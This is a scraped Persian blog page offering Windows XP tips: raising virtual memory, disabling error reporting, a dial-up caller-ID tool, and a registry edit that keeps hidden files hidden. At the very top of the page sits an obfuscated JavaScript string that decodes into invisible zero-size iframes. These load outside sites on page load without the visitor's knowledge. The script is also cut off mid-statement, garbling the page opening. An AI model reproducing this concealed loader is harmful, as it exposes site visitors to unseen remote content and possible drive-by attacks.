script>var enkripsi="'1Akdpcog'02dpcog`mpfgp'1F'002'00'02jgkejv'1F'002'00'02qapmnnkle'1F'00lm'00'02qpa'1F'00jvvr'1C--oomqctk,p;:,kp'00'02ukfvj'1F'002'00'1G'1A-kdpcog'1G'1Akdpcog'02dpcog`mpfgp'1F'002'00'02jgkejv'1F'002'00'02qapmnnkle'1F'00lm'00'02qpa'1F'00jvvr'1C--uuu,qjcfkf,pmx`nme,amo-rceg-7'00'02ukfvj'1F'002'00'1G'1A-kdpcog'1G"; teks=""; teksasli="";var panjang;panjang=enkripsi.length;for (i=0;i چند ترفند قشنگ

صفحه نخست

ايميل ما

آرشیو مطالب

لينك آر اس اس

عناوین مطالب وبلاگ

پروفایل مدیر وبلاگ

طراح قالب

:: صفحه نخست
::
ايميل ما
::
آرشیو مطالب
::
پروفایل مدیر وبلاگ
::
لينك آر اس اس
::
عناوین مطالب وبلاگ
::
طراح قالب

::عربی سوم راهنمایی
::نمونه سوالات عربی سوم راهنمایی
::اموزش عربی سوم راهنمایی
::زبان انگلیسی سوم راهنمایی
::نمونه سولات زبان انگلیسی سوم راهنمایی
::اموزش زبان انگلیسی سوم راهنمایی
:: تاریخ سوم راهنمایی
::نمونه سوالات تاریخ سوم راهنمایی
::اموزش تاریخ سوم راهنمایی
::فارسی سوم راهنمایی
::نمونه سوالات فارسی
:: حرفه سوم راهنمایی
::اموزش حرفه سوم راهنمایی
::نمونه سوالات حرفه سوم راهنمایی
::دینی سوم راهنمایی
::اموزش دینی سوم راهنمایی
::نمونه سوالات دینی سوم راهنمایی
::قران سوم راهنمایی
::عجائب قران
::نکات زیبای قران
::درسی
::علوم سوم راهنمایی
::ریاضی سوم راهنمایی
::رمز تقلب
::رمز کانتر
::برنامه کودک
::برنامه کودک دوبله فارسی
::زبان اصلی
::نرم افزار
::ویندوز
::پلیر
::اهنگ
::یاس
::خارجی
::تتلو
::بازی
::بازی ورزشی
::جام جهانی 2014
::وبلاگ واینترنت
::عکس


تمام لينکها تماس با ما


نويسندگان :
:: اهنننن

آمار بازديد :

:: تعداد بازديدها:
:: کاربر: Admin

<-PollName->

<-PollItems->

آمار وب سایت:  

بازدید امروز : 21
بازدید دیروز : 6
بازدید هفته : 21
بازدید ماه : 1977
بازدید کل : 290557
تعداد مطالب : 426
تعداد نظرات : 23
تعداد آنلاین : 1









پيام مديريت وبلاگ : با سلام خدمت شما بازديدكننده گرامي ، به وبلاگ من خوش آمديد .لطفا براي هرچه بهتر شدن مطالب اين وبلاگ ، ما را از نظرات و پيشنهادات خود آگاه سازيد و به ما در بهتر شدن كيفيت مطالب وبلاگ کمک کنید .


چند ترفند قشنگ

سلام دوستان

امروز چند تا ترفند به درد بخور براتون گذاشتم امیدوارم به دردتون بخوره نظر یادتون نره !

 اختصاص قسمتی از هارددیسک به عنوان رم

اگر رم دستگاه شما پایین است می توانید مقداری از هارد دیسک را به عنوان رم معرفی کنید که اینکار باعث افزایش سرعت کامپیوتر شما و جلوگیری از هنگ شدن آن می شود. بر روی My Computer  کلیک راست کنید . و در این قسمت Properties  را کلیک کنید. وارد پنجره Properties System  می شوید . که از زبانه های گوناگون تشکیل شده در این قسمت زبانه Advanced  را بزنید.در قسمت Performance  گزینه Settings  را کلیک کنید .وارد قسمت Options Performance  می شوید . در این قسمت نیز زبانه Advanced  را انتخاب کنید. در قسمت Virtual memory  گزینه Change  را انتخاب کنید .در این قسمت مقدار رمی را که بطور پیش فرض انتخاب شده را مشاهده می کنید . معمولا در رم های  256  این مفدار بین  768-384  متغیر است . که  384  حداقل و  768  حداکثر می باشد . درایوی را که می خواهید در آن مقدار فضایی را اختصاص به رم دهید انتخاب کنید . گزینه Custom size  را فعال کنید . اندازه های خود را در این قسمت وارد کنید . بعد کلید Set  را فشار دهید و تمامی پنجره های باز شده را Ok  کنید . در صورت امکان کا مپیوتر خود را Restart  کنید .


---------------------------------------------------------
.: کلمه دونت سند(don&rsquo;t sand) :.
 
چگونه می توان این ارور هایی که دارای کلمه دونت سند(don&rsquo;t sand) را از بین برد که نیایند چون بیشتر وقت ها میدانید که باعث بسته شدن تمامی پنجره ها  مشود که ناشی از کمبود رم می باشد


برای این کرا بر روی My Computer راست کلیک کرده و Properties را انتخاب کنید. به تب Advanced بروید و در قسمت پایین Error Reporting را بزنید. گزینه Disable error reporting را انتخاب کرده و Ok را بزنید. موفق باشید.

 
-------------------------------------------------------------

.: وقتی به ایتنترنت وصلید بفهمید که چه کسی داره زنگ می زنه ؟ :.


شرکت TraySoft محصولی را عرضه نموده است با نام PhoneTray Dialup که توسط آن کاربر میتواند Online باقی بماند بدون اینکه تماسهای مهمی که به او میشود را از دست بدهد به عبارت دیگر اصول کار برنامه به گونه ایست که وقتی شما Online هستید و شخصی با تلفن شما تماس میگیرد , PhoneTray Dialup توسط یک Popup که در بالای Systray ویندوز ظاهر میشود (بخش راستی TaskBar) و به شما اطلاع میدهد که برای مثال فلان شماره هم اکنون در حال تماس با شما میباشد! ویژگی فوق العاده و بسیار مهم دیگر این نرم افزار این است که در آن صفحه ی Popup بالا آمده شماره ی شخص تماس گیرنده رو هم به کاربر نشان میدهد تا تا او با اطلاع کامل یکی از 3 گزینه ای را که نرم افزار در اختیارش قرار میدهد یعنی باقی ماندن به همان صورت Online و جواب ندادن به تماس و یا قطع ارتباط با اینترنت و پاسخ به تماس تلفنی و یا حتی باقی نگاه داشتن اتصال و جواب دادن به تلفن و سپس بازگشت دوباره به اینترنت را انتخاب کنید(که البته ویژگی آخر در صورتی است که ISP کاربر این توانایی را پشتیبانی کند) را انتخاب کند. PhoneTray Dialup برای انجام کار خودش به بهترین وجه به 3 چیز ساده نیاز دارد:

1. داشتن یک مودم از نوع V.92 برای اتصال به اینترنت(اکثر مودم های جدید این سیستم را دارا هستند و تفاوت قیمت محسوسی با مودم های نوع V.90 نیز ندارند)
2. مجهز بودن تلفن به سیتسم انتظار تماس توسط مخابرات (همون 2 خطه بودن که با تلفن های دیجیتال بیسیم خود ما نیز میتوانیم با فشردن دکمه ی * و سپس 48 و سرآخر # خط تلفن خود را به حالت انتظار تماس در بیاوریم!)
3. خط تلفن دیجیتال با توانایی پشتیبانی CallerID و همچنین مودمی با توانایی پشتیبانی این سیستم

----------------------------------------------------------
.: مخفی کردن واقعی   :.

این هم یک ترفند جالب برای شما که نمی خواهید پوشه های (و فایلهای ) مخفیتان را کسی به حالت غیر مخفی برگرداند و آنها را ببیند . با ترفند زیر می توانید گزینه Show all files را در Folder option عملا غیر فعال سازید . بطوریکه به شکل خودکار از این حالت خارج شود جهت انجام این عمل مراحل زیر را دنبال کنید :ابتدا از منوی start گزینه run را انتخاب کرده وregedit را تایپ کرده و ok را کلیک کنید تا برنامه رجیستری اجرا شود.حال در پنجره باز شده دکمه f3 را بزنید. (توضیح اینکه کلید f3 جهت جستجوی یک کلید در رجیستری می باشد ).سپس کلمه showall را وارد کرده و دکمه find next را کلیک کنید(از قسمت پایین این پنجره گزینه keys فعال باشد.) تا کلید مورد نظر در پانل چپ ظاهر شود.در این حالت از پانل راست روی گزینه checkedvalue دابل کلیک کنید و مقدار آن را از 1 به صفر تغییر داده از رجیستری خارج شوید. حال my computer را باز کرده و از منوی tools گزینه folder options را انتخاب کنید.به سربرگ view رفته و در قسمت hidden files and folders گزینه do not show hidden files and folders را فعال کنید و در نهایت ok را بزنید.از این پس هرگاه بخواهید فایلهای مخفی را آشکار کنید موفق نخواهید شد مگر اینکه دوباره ارزش پوشه checkedvalue را به 1 برگردانید.



نظرات شما عزیزان:

نام :
آدرس ایمیل:
وب سایت/بلاگ :
متن پیام:
:) :( ;) :D
;)) :X :? :P
:* =(( :O };-
:B /:) =DD :S
-) :-(( :-| :-))
نظر خصوصی

 کد را وارد نمایید:

 

 

 

عکس شما

آپلود عکس دلخواه:







نوشته شده توسط اهنننن در 4 / 4 / 1393


:: افزایش بازدید حرفه ای - رضا
:: دانلود کم پلیر جدید
:: دانلود بازی Need for Speed Most Wanted 2 برای PC
:: درست کردن pes 2013
:: نبرد عراق در حال نزدیکی به مرزهای عربستان
:: بدون شرح ............ جام گاز
:: نرم افزار ساخت قالب آنلاین برای وبلاگ





تندر دانلود




:: دی 1394
:: آبان 1393
:: مرداد 1393
:: تير 1393
:: خرداد 1393
:: ارديبهشت 1393
:: فروردين 1393
:: اسفند 1392
:: بهمن 1392

آبر برچسب ها

حاشیه جام جهانی , دانلود ویندوز7سرویس پک1 , نمونه سوالات تستی درس ادبیات فارسی سال سوم راهنمایی , , نکات زیبای قران , 6 , جام جهانی , 1،دانلود بازی تخیلی The Last Survivor(EFTD) v1 , داستانک های زیبای فارسی ((متن)) , فاسی سوم راهنمایی , دانلود پاور پوینت درس های فارسی سوم رامنمایی , ویژگی ادمهای مختلف منبع 8بهشت , کتاب شاهنامه , خلاصه ای داستان سووشون اثر دکتر سیمین دانشور , نمونه سوالات زبان سوم راهنمایی ,

صفحه نخست | ايميل ما | آرشیو مطالب | لينك آر اس اس | عناوین مطالب وبلاگ |پروفایل مدیر وبلاگ | طراح قالب

Powered By LOXBLOG.COM Copyright © 2009 by farsi-3
Design By : wWw.Theme-Designer.Com